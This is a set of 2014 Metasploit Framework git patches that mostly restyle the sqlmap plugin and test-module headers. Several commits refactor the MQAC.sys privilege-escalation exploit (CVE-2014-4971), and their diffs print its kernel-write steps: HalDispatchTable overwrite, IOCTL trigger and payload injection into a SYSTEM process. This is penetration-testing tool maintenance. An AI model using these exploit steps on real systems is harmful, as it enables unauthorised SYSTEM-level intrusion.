diff --git a/plugins/sqlmap.rb b/plugins/sqlmap.rb
index 90a9e207f8..2e18971081 100644
--- a/plugins/sqlmap.rb
+++ b/plugins/sqlmap.rb
@@ -32,8 +32,7 @@ module Msf
           return
         end
 
-        host = args[0]
-        port = args.length == 2 ? args[1] : nil
+        host, port = args
 
         if !port
           @manager = Sqlmap::Manager.new(Sqlmap::Session.new(host))
@@ -47,7 +46,7 @@ module Msf
       def cmd_sqlmap_set_option(*args)
         unless args.length == 3
           print_error('Usage:')
-          print_error('\tsqlmap_set_option <taskid> <option_name> <option_value>')
+          print_error("\tsqlmap_set_option <taskid> <option_name> <option_value>")
           return
         end
 
@@ -56,27 +55,21 @@ module Msf
           return
         end
 
-        val = args[2]
-        if args[2] =~ /^\d+$/
-          val = val.to_i
-        end
+        val = args[2] =~ /^\d+$/ ? args[2].to_i : args[2]
 
         res = @manager.set_option(@hid_tasks[args[0]], args[1], val)
-        print_status('Success: ' + res['success'].to_s)
+        print_status("Success: #{res['success']}")
       end
 
       def cmd_sqlmap_start_task(*args)
         if args.length == 0
           print_error('Usage:')
-          print_error('\tsqlmap_start_task <taskid> [<url>]')
+          print_error("\tsqlmap_start_task <taskid> [<url>]")
           return
         end
 
         options = {}
-
-        if args.length == 2
-          options['url'] = args[1]
-        end
+        options['url'] = args[1] if args.length == 2
 
         if !options['url'] && @tasks[@hid_tasks[args[0]]]['url'] == ''
           print_error('You need to specify a URL either as an argument to sqlmap_start_task or sqlmap_set_option')
@@ -89,13 +82,13 @@ module Msf
         end
 
         res = @manager.start_task(@hid_tasks[args[0]], options)
-        print_status('Started task: ' + res['success'].to_s)
+        print_status('Started task: #{res['success']}')
       end
 
       def cmd_sqlmap_get_log(*args)
         unless args.length == 1
           print_error('Usage:')
-          print_error('\tsqlmap_get_log <taskid>')
+          print_error("\tsqlmap_get_log <taskid>")
           return
         end
 
@@ -114,7 +107,7 @@ module Msf
       def cmd_sqlmap_get_status(*args)
         unless args.length == 1
           print_error('Usage:')
-          print_error('\tsqlmap_get_status <taskid>')
+          print_error("\tsqlmap_get_status <taskid>")
           return
         end
 
@@ -131,7 +124,7 @@ module Msf
       def cmd_sqlmap_get_data(*args)
         unless args.length == 1
           print_error('Usage:')
-          print_error('\tsqlmap_get_data <taskid>')
+          print_error("\tsqlmap_get_data <taskid>")
           return
         end
 
@@ -171,7 +164,7 @@ module Msf
       def cmd_sqlmap_save_data(*args)
         unless args.length == 1
           print_error('Usage:')
-          print_error('\tsqlmap_save_data <taskid>')
+          print_error("\tsqlmap_save_data <taskid>")
           return
         end
 
@@ -199,8 +192,8 @@ module Msf
         proto = url.split(':')[0]
         host = url.split('/')[2]
         port = 80
-        port = host.split(':')[1] if host.index(':')
-        host = host.split(':')[0] if host.index(':')
+        port = host.split(':')[1] if host[':']
+        host = host.split(':')[0] if host[':']
         path = '/' + (url.split('/')[3..(url.split('/').length - 1)].join('/'))
         query = url.split('?')[1]
         web_vuln_info[:web_site] = url
@@ -232,7 +225,7 @@ module Msf
 
         unless args.length == 2
           print_error('Usage:')
-          print_error('\tsqlmap_get_option <taskid> <option_name>')
+          print_error("\tsqlmap_get_option <taskid> <option_name>")
         end
 
         unless @manager
@@ -246,7 +239,7 @@ module Msf
         if @tasks[@hid_tasks[args[0]]]
           print_good(args[1] + ': ' + @tasks[@hid_tasks[args[0]]][args[1]].to_s)
         else
-          print_error('Option ' + args[0] + ' doesn\'t exist')
+          print_error("Option #{args[0]} doesn't exist")
         end
       end
 
@@ -263,14 +256,14 @@ module Msf
         @hid_tasks[(@hid_tasks.length+1).to_s] = taskid
         task_options = @manager.get_options(taskid)
         @tasks[@hid_tasks[@hid_tasks.length]] = task_options['options']
-        print_good('Created task: ' + @hid_tasks.length.to_s)
+        print_good("Created task: #{@hid_tasks.length}")
       end
 
       def cmd_sqlmap_list_tasks(*args)
         @hid_tasks ||= {}
         @tasks ||= {}
         @hid_tasks.each do |task, options|
-          print_good('Task ID: ' + task.to_s)
+          print_good("Task ID: #{task}")
         end
       end
     end

From 3fd15d001d85dfb53f32c1d0ef64740d490ca5d6 Mon Sep 17 00:00:00 2001
From: Victor <nakilon@gmail.com>
Date: Mon, 4 Aug 2014 04:25:33 +0400
Subject: [PATCH 219/321] Update sqlmap.rb

---
 plugins/sqlmap.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/plugins/sqlmap.rb b/plugins/sqlmap.rb
index 2e18971081..8d1e840570 100644
--- a/plugins/sqlmap.rb
+++ b/plugins/sqlmap.rb
@@ -82,7 +82,7 @@ module Msf
         end
 
         res = @manager.start_task(@hid_tasks[args[0]], options)
-        print_status('Started task: #{res['success']}')
+        print_status("Started task: #{res['success']}")
       end
 
       def cmd_sqlmap_get_log(*args)

From cbf15660bfab7f6c5444c130127632bae5d51e36 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 24 Jul 2014 14:44:26 +1000
Subject: [PATCH 220/321] Add some small fixes to the MQAC local exploit

* Check for `INVALID_HANDLE_VALUE` when attempting to open the
  device, as this is what is returned when the device doesn't exist.
* Make sure that we only run the exploit against tartgets that we
  support directly to make sure we don't BSOD machines (such as what
  happens with SP1/SP2).
* Add a call to `check` in the exploit code.
---
 modules/exploits/windows/local/mqac_write.rb | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
index e878c18323..1f3ca75f68 100644
--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -12,6 +12,8 @@ class Metasploit3 < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
 
+  INVALID_HANDLE_VALUE = 0xFFFFFFFF
+
   def initialize(info={})
     super(update_info(info, {
       'Name'           => 'MQAC.sys Arbitrary Write Privilege Escalation',
@@ -107,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   def check
     handle = open_device
-    if handle.nil?
+    if handle.nil? || handle == INVALID_HANDLE_VALUE
       return Exploit::CheckCode::Safe
     end
     session.railgun.kernel32.CloseHandle(handle)
@@ -137,12 +139,19 @@ class Metasploit3 < Msf::Exploit::Local
       return
     end
 
+    # Running on Windows XP versions that aren't listed in the supported list results
+    # in a BSOD and so we should not let that happen.
+    if check != Exploit::CheckCode::Appears
+      print_error("Target machine not supported (incorrect Windows version or missing MSMQ)")
+      return
+    end
+
     kernel_info = find_sys_base(nil)
     base_addr = 0xffff
     print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
 
     handle = open_device
-    return if handle.nil?
+    return if handle.nil? || handle == INVALID_HANDLE_VALUE
 
     this_proc = session.sys.process.open
     unless this_proc.memory.writable?(base_addr)

From 31c51eeb63cc487394dc85dc979f80833891b9cf Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 25 Jul 2014 07:57:09 +1000
Subject: [PATCH 221/321] Move error messages to `check`

---
 modules/exploits/windows/local/mqac_write.rb | 7 +++----
 1 file changed, 3 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
index 1f3ca75f68..4bd44b8880 100644
--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -110,6 +110,7 @@ class Metasploit3 < Msf::Exploit::Local
   def check
     handle = open_device
     if handle.nil? || handle == INVALID_HANDLE_VALUE
+      print_error("MSMQ installation not found")
       return Exploit::CheckCode::Safe
     end
     session.railgun.kernel32.CloseHandle(handle)
@@ -119,6 +120,7 @@ class Metasploit3 < Msf::Exploit::Local
     when /windows xp.*service pack 3/i
       return Exploit::CheckCode::Appears
     when /windows xp/i
+      print_error("Incorrect version of Windows XP detected")
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Safe
@@ -141,10 +143,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     # Running on Windows XP versions that aren't listed in the supported list results
     # in a BSOD and so we should not let that happen.
-    if check != Exploit::CheckCode::Appears
-      print_error("Target machine not supported (incorrect Windows version or missing MSMQ)")
-      return
-    end
+    return unless check == Exploit::CheckCode::Appears
 
     kernel_info = find_sys_base(nil)
     base_addr = 0xffff

From 2b021e647d38835e606f260c38c168586884e92a Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 25 Jul 2014 09:32:54 +1000
Subject: [PATCH 222/321] Minor tidies to conform to standards

---
 modules/exploits/windows/local/mqac_write.rb | 46 ++++++++++----------
 1 file changed, 23 insertions(+), 23 deletions(-)

diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
index 4bd44b8880..9043140569 100644
--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -61,10 +61,10 @@ class Metasploit3 < Msf::Exploit::Local
 
   def find_sys_base(drvname)
     session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
-    session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]])
-    session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]])
+    session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ['PBLOB', 'lpImageBase', 'out'], ['DWORD', 'cb', 'in'], ['PDWORD', 'lpcbNeeded', 'out']])
+    session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ['LPVOID', 'ImageBase', 'in'], ['PBLOB', 'lpBaseName', 'out'], ['DWORD', 'nSize', 'in']])
     results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('L*')
 
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
@@ -82,24 +82,24 @@ class Metasploit3 < Msf::Exploit::Local
   # Function borrowed from smart_hashdump
   def get_system_proc
     # Make sure you got the correct SYSTEM Account Name no matter the OS Language
-    local_sys = resolve_sid("S-1-5-18")
+    local_sys = resolve_sid('S-1-5-18')
     system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
 
     this_pid = session.sys.process.getpid
     # Processes that can Blue Screen a host if migrated in to
-    dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
+    dangerous_processes = ['lsass.exe', 'csrss.exe', 'smss.exe']
     session.sys.process.processes.each do |p|
       # Check we are not migrating to a process that can BSOD the host
-      next if dangerous_processes.include?(p["name"])
-      next if p["pid"] == this_pid
-      next if p["pid"] == 4
-      next if p["user"] != system_account_name
+      next if dangerous_processes.include?(p['name'])
+      next if p['pid'] == this_pid
+      next if p['pid'] == 4
+      next if p['user'] != system_account_name
       return p
     end
   end
 
   def open_device
-    handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
+    handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
     if handle['return'] == 0
       print_error('Failed to open the \\\\.\\MQAC device')
       return nil
@@ -110,17 +110,17 @@ class Metasploit3 < Msf::Exploit::Local
   def check
     handle = open_device
     if handle.nil? || handle == INVALID_HANDLE_VALUE
-      print_error("MSMQ installation not found")
+      print_error('MSMQ installation not found')
       return Exploit::CheckCode::Safe
     end
     session.railgun.kernel32.CloseHandle(handle)
 
-    os = sysinfo["OS"]
+    os = sysinfo['OS']
     case os
     when /windows xp.*service pack 3/i
       return Exploit::CheckCode::Appears
     when /windows xp/i
-      print_error("Incorrect version of Windows XP detected")
+      print_error('Unsupported version of Windows XP detected')
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Safe
@@ -128,16 +128,16 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def exploit
-    if sysinfo["Architecture"] =~ /wow64/i
-      print_error("Running against WOW64 is not supported")
+    if sysinfo['Architecture'] =~ /wow64/i
+      print_error('Running against WOW64 is not supported')
       return
-    elsif sysinfo["Architecture"] =~ /x64/
-      print_error("Running against 64-bit systems is not supported")
+    elsif sysinfo['Architecture'] =~ /x64/
+      print_error('Running against 64-bit systems is not supported')
       return
     end
 
     if is_system?
-      print_error("This meterpreter session is already running as SYSTEM")
+      print_error('This meterpreter session is already running as SYSTEM')
       return
     end
 
@@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     this_proc = session.sys.process.open
     unless this_proc.memory.writable?(base_addr)
-      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
+      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack('L'), nil, [ 0xffff ].pack('L'), 'MEM_COMMIT|MEM_RESERVE', 'PAGE_EXECUTE_READWRITE')
     end
     unless this_proc.memory.writable?(base_addr)
       print_error('Failed to properly allocate memory')
@@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
     hKernel = hKernel['return']
-    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
+    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
     halDispatchTable = halDispatchTable['return']
     halDispatchTable -= hKernel
     halDispatchTable += kernel_info[0]
@@ -192,19 +192,19 @@ class Metasploit3 < Msf::Exploit::Local
     this_proc.memory.write(0x1, shellcode)
     this_proc.close
 
-    print_status("Triggering vulnerable IOCTL")
+    print_status('Triggering vulnerable IOCTL')
     session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
     result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
 
     unless is_system?
-      print_error("Exploit failed")
+      print_error('Exploit failed')
       return
     end
 
     proc = get_system_proc
     print_status("Injecting the payload into SYSTEM process: #{proc['name']}")
     unless execute_shellcode(payload.encoded, nil, proc['pid'])
-      fail_with(Failure::Unknown, "Error while executing the payload")
+      fail_with(Failure::Unknown, 'Error while executing the payload')
     end
   end
 

From 6c2b8f54cff34d507fbcaf03a68c8057160fe1d2 Mon Sep 17 00:00:00 2001
From: Joshua Smith <kernelsmith@metasploit.com>
Date: Mon, 28 Jul 2014 22:04:45 -0500
Subject: [PATCH 223/321] rubocop cleanup, long lines, etc

---
 modules/exploits/windows/local/mqac_write.rb | 89 ++++++++++++--------
 1 file changed, 52 insertions(+), 37 deletions(-)

diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
index 9043140569..6b6401dc6e 100644
--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -14,62 +14,70 @@ class Metasploit3 < Msf::Exploit::Local
 
   INVALID_HANDLE_VALUE = 0xFFFFFFFF
 
-  def initialize(info={})
-    super(update_info(info, {
+  def initialize(info = {})
+    super(update_info(info,
       'Name'           => 'MQAC.sys Arbitrary Write Privilege Escalation',
-      'Description'    => %q{
+      'Description'    => %q(
         A vulnerability within the MQAC.sys module allows an attacker to
         overwrite an arbitrary location in kernel memory.
 
         This module will elevate itself to SYSTEM, then inject the payload
         into another SYSTEM process.
-      },
+      ),
       'License'       => MSF_LICENSE,
       'Author'        =>
         [
           'Matt Bergin', # original exploit and all the hard work
           'Spencer McIntyre' # MSF module
         ],
-      'Arch'           => [ ARCH_X86 ],
-      'Platform'       => [ 'win' ],
-      'SessionTypes'   => [ 'meterpreter' ],
+      'Arch'           => [ARCH_X86],
+      'Platform'       => ['win'],
+      'SessionTypes'   => ['meterpreter'],
       'DefaultOptions' =>
         {
-          'EXITFUNC'   => 'thread',
+          'EXITFUNC'   => 'thread'
         },
       'Targets'        =>
         [
-          [ 'Windows XP SP3',
-            {
-              '_KPROCESS' => "\x44",
-              '_TOKEN' => "\xc8",
-              '_UPID' => "\x84",
-              '_APLINKS' => "\x88"
-            }
-          ],
+          ['Windows XP SP3',
+           {
+             '_KPROCESS'  => "\x44",
+             '_TOKEN'     => "\xc8",
+             '_UPID'      => "\x84",
+             '_APLINKS'   => "\x88"
+           }
+          ]
         ],
-      'References'    =>
+      'References'     =>
         [
-          [ 'CVE', '2014-4971' ],
-          [ 'EDB', '34112' ],
-          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ]
+          %w(CVE 2014-4971),
+          %w(EDB 34112),
+          ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']
         ],
-      'DisclosureDate'=> 'Jul 22 2014',
-      'DefaultTarget' => 0
-    }))
+      'DisclosureDate' => 'Jul 22 2014',
+      'DefaultTarget'  => 0
+    ))
   end
 
   def find_sys_base(drvname)
-    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
-    session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ['PBLOB', 'lpImageBase', 'out'], ['DWORD', 'cb', 'in'], ['PDWORD', 'lpcbNeeded', 'out']])
-    session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ['LPVOID', 'ImageBase', 'in'], ['PBLOB', 'lpBaseName', 'out'], ['DWORD', 'nSize', 'in']])
+    session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
+    lp_image_base = %w(PBLOB lpImageBase out)
+    cb = %w(DWORD cb in)
+    lpcb_needed = %w(PDWORD lpcbNeeded out)
+    session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL',
+                                 [lp_image_base, cb, lpcb_needed])
+    image_base = %w(LPVOID ImageBase in)
+    lp_base_name = %w(PBLOB lpBaseName out)
+    n_size = %w(DWORD nSize in)
+    session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD',
+                                 [image_base, lp_base_name, n_size])
     results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
     addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('L*')
 
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
       current_drvname = results['lpBaseName'][0..results['return'] - 1]
-      if drvname == nil
+      if drvname.nil?
         if current_drvname.downcase.include?('krnl')
           return [address, current_drvname]
         end
@@ -99,12 +107,14 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def open_device
-    handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
-    if handle['return'] == 0
+    handle = session.railgun.kernel32.CreateFileA('\\\\.\\MQAC',
+      'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
+    handle = handle['return']
+    if handle == 0
       print_error('Failed to open the \\\\.\\MQAC device')
       return nil
     end
-    handle = handle['return']
+    handle
   end
 
   def check
@@ -141,8 +151,8 @@ class Metasploit3 < Msf::Exploit::Local
       return
     end
 
-    # Running on Windows XP versions that aren't listed in the supported list results
-    # in a BSOD and so we should not let that happen.
+    # Running on Windows XP versions that aren't listed in the supported list
+    # results in a BSOD and so we should not let that happen.
     return unless check == Exploit::CheckCode::Appears
 
     kernel_info = find_sys_base(nil)
@@ -154,7 +164,10 @@ class Metasploit3 < Msf::Exploit::Local
 
     this_proc = session.sys.process.open
     unless this_proc.memory.writable?(base_addr)
-      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack('L'), nil, [ 0xffff ].pack('L'), 'MEM_COMMIT|MEM_RESERVE', 'PAGE_EXECUTE_READWRITE')
+      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('L'), nil,
+                                                    [0xffff].pack('L'),
+                                                    'MEM_COMMIT|MEM_RESERVE',
+                                                    'PAGE_EXECUTE_READWRITE')
     end
     unless this_proc.memory.writable?(base_addr)
       print_error('Failed to properly allocate memory')
@@ -164,7 +177,8 @@ class Metasploit3 < Msf::Exploit::Local
 
     hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
     hKernel = hKernel['return']
-    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
+    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel,
+                                                              'HalDispatchTable')
     halDispatchTable = halDispatchTable['return']
     halDispatchTable -= hKernel
     halDispatchTable += kernel_info[0]
@@ -193,8 +207,10 @@ class Metasploit3 < Msf::Exploit::Local
     this_proc.close
 
     print_status('Triggering vulnerable IOCTL')
-    session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
-    result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
+    session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f,
+                                                1, 0x258,
+                                                halDispatchTable + 0x4, 0)
+    session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
 
     unless is_system?
       print_error('Exploit failed')
@@ -207,5 +223,4 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Failure::Unknown, 'Error while executing the payload')
     end
   end
-
 end

From c08b1cb82926d7e1c300f5f385615b710ba7e451 Mon Sep 17 00:00:00 2001
From: Joshua Smith <kernelsmith@metasploit.com>
Date: Sun, 3 Aug 2014 23:59:03 -0500
Subject: [PATCH 224/321] uses mult-assign & include? more readable

---
 plugins/sqlmap.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/plugins/sqlmap.rb b/plugins/sqlmap.rb
index 8d1e840570..8d6e75ba0c 100644
--- a/plugins/sqlmap.rb
+++ b/plugins/sqlmap.rb
@@ -192,8 +192,7 @@ module Msf
         proto = url.split(':')[0]
         host = url.split('/')[2]
         port = 80
-        port = host.split(':')[1] if host[':']
-        host = host.split(':')[0] if host[':']
+        host, port = host.split(':') if host.include?(':')
         path = '/' + (url.split('/')[3..(url.split('/').length - 1)].join('/'))
         query = url.split('?')[1]
         web_vuln_info[:web_site] = url

From a4f2fb218c86b976812c9d6e88397b6ead6a239c Mon Sep 17 00:00:00 2001
From: Joshua Smith <kernelsmith@metasploit.com>
Date: Mon, 4 Aug 2014 00:11:25 -0500
Subject: [PATCH 225/321] adds most rubocop cleanups, not all

---
 plugins/sqlmap.rb | 27 ++++++++++++++-------------
 1 file changed, 14 insertions(+), 13 deletions(-)

diff --git a/plugins/sqlmap.rb b/plugins/sqlmap.rb
index 8d6e75ba0c..6115a3a7b6 100644
--- a/plugins/sqlmap.rb
+++ b/plugins/sqlmap.rb
@@ -8,7 +8,7 @@ module Msf
       include Msf::Ui::Console::CommandDispatcher
 
       def name
-        "Sqlmap"
+        'Sqlmap'
       end
 
       def commands
@@ -100,7 +100,7 @@ module Msf
         res = @manager.get_task_log(@hid_tasks[args[0]])
 
         res['log'].each do |message|
-          print_status("[#{message["time"]}] #{message["level"]}: #{message["message"]}")
+          print_status("[#{message['time']}] #{message['level']}: #{message['message']}")
         end
       end
 
@@ -144,7 +144,7 @@ module Msf
         res = @manager.get_task_data(@hid_tasks[args[0]])
 
         tbl = Rex::Ui::Text::Table.new(
-          'Columns' => ['Title','Payload'])
+          'Columns' => ['Title', 'Payload'])
 
         res['data'].each do |d|
           d['value'].each do |v|
@@ -207,7 +207,7 @@ module Msf
             web_vuln_info[:pname] = v['parameter']
             web_vuln_info[:method] = v['place']
             web_vuln_info[:payload] = v['suffix']
-            v['data'].each do |k,i|
+            v['data'].values.each do |i|
               web_vuln_info[:name] = i['title']
               web_vuln_info[:description] = res.to_json
               web_vuln_info[:proof] = i['payload']
@@ -232,17 +232,18 @@ module Msf
           return
         end
 
-        task_options = @manager.get_options(@hid_tasks[args[0]])
-        @tasks[@hid_tasks[args[0]]] = task_options['options']
+        arg = args.first
+        task_options = @manager.get_options(@hid_tasks[arg])
+        @tasks[@hid_tasks[arg]] = task_options['options']
 
-        if @tasks[@hid_tasks[args[0]]]
-          print_good(args[1] + ': ' + @tasks[@hid_tasks[args[0]]][args[1]].to_s)
+        if @tasks[@hid_tasks[arg]]
+          print_good(args[1] + ': ' + @tasks[@hid_tasks[arg]][args[1]].to_s)
         else
-          print_error("Option #{args[0]} doesn't exist")
+          print_error("Option #{arg} doesn't exist")
         end
       end
 
-      def cmd_sqlmap_new_task(*args)
+      def cmd_sqlmap_new_task
         @hid_tasks ||= {}
         @tasks ||= {}
 
@@ -252,16 +253,16 @@ module Msf
         end
 
         taskid = @manager.new_task['taskid']
-        @hid_tasks[(@hid_tasks.length+1).to_s] = taskid
+        @hid_tasks[(@hid_tasks.length + 1).to_s] = taskid
         task_options = @manager.get_options(taskid)
         @tasks[@hid_tasks[@hid_tasks.length]] = task_options['options']
         print_good("Created task: #{@hid_tasks.length}")
       end
 
-      def cmd_sqlmap_list_tasks(*args)
+      def cmd_sqlmap_list_tasks
         @hid_tasks ||= {}
         @tasks ||= {}
-        @hid_tasks.each do |task, options|
+        @hid_tasks.keys.each do |task|
           print_good("Task ID: #{task}")
         end
       end

From 6884c87cfaf2f592886de721d98f2679df1fb15e Mon Sep 17 00:00:00 2001
From: Joshua Smith <kernelsmith@metasploit.com>
Date: Mon, 4 Aug 2014 00:53:34 -0500
Subject: [PATCH 226/321] removes IDs/Revisions, resplats test/modules

---
 test/modules/auxiliary/test/capture.rb       | 11 ++---------
 test/modules/auxiliary/test/check.rb         |  6 ++----
 test/modules/auxiliary/test/eth_spoof.rb     | 11 ++---------
 test/modules/auxiliary/test/ftp_data.rb      | 11 ++---------
 test/modules/auxiliary/test/ip_spoof.rb      | 11 ++---------
 test/modules/auxiliary/test/recon_passive.rb | 11 ++---------
 test/modules/auxiliary/test/scanner_batch.rb | 11 ++---------
 test/modules/auxiliary/test/scanner_host.rb  | 11 ++---------
 test/modules/auxiliary/test/scanner_range.rb | 11 ++---------
 test/modules/auxiliary/test/space-check.rb   |  6 ++----
 test/modules/exploits/test/aggressive.rb     | 11 ++---------
 test/modules/exploits/test/check.rb          |  6 ++----
 test/modules/exploits/test/cmdweb.rb         | 11 ++---------
 test/modules/exploits/test/dialup.rb         | 11 ++---------
 test/modules/exploits/test/egghunter.rb      | 11 ++---------
 test/modules/exploits/test/exploitme.rb      | 11 ++---------
 test/modules/exploits/test/java_tester.rb    | 11 ++---------
 test/modules/exploits/test/kernel.rb         | 11 ++---------
 test/modules/exploits/test/shell.rb          | 11 ++---------
 19 files changed, 38 insertions(+), 156 deletions(-)

diff --git a/test/modules/auxiliary/test/capture.rb b/test/modules/auxiliary/test/capture.rb
index 766a833bab..696fae60ac 100644
--- a/test/modules/auxiliary/test/capture.rb
+++ b/test/modules/auxiliary/test/capture.rb
@@ -1,12 +1,6 @@
 ##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 
@@ -21,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
   def initialize
     super(
       'Name'        => 'Simple Network Capture Tester',
-      'Version'     => '$Revision$',
       'Description' => 'This module sniffs HTTP GET requests from the network',
       'Author'      => 'hdm',
       'License'     => MSF_LICENSE,
diff --git a/test/modules/auxiliary/test/check.rb b/test/modules/auxiliary/test/check.rb
index b04ab8ac23..cf06103ff5 100644
--- a/test/modules/auxiliary/test/check.rb
+++ b/test/modules/auxiliary/test/check.rb
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-#   http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
diff --git a/test/modules/auxiliary/test/eth_spoof.rb b/test/modules/auxiliary/test/eth_spoof.rb
index 640718fda3..948483bcdd 100644
--- a/test/modules/auxiliary/test/eth_spoof.rb
+++ b/test/modules/auxiliary/test/eth_spoof.rb
@@ -1,12 +1,6 @@
 ##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 
@@ -21,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
   def initialize
     super(
       'Name'        => 'Simple Ethernet Frame Spoofer',
-      'Version'     => '$Revision$',
       'Description' => 'This module sends spoofed ethernet frames',
       'Author'      => 'hdm',
       'License'     => MSF_LICENSE,
diff --git a/test/modules/auxiliary/test/ftp_data.rb b/test/modules/auxiliary/test/ftp_data.rb
index 415e41b94a..4a35b319a2 100644
--- a/test/modules/auxiliary/test/ftp_data.rb
+++ b/test/modules/auxiliary/test/ftp_data.rb
@@ -1,12 +1,6 @@
 ##
-# $Id$
-##
-
-##
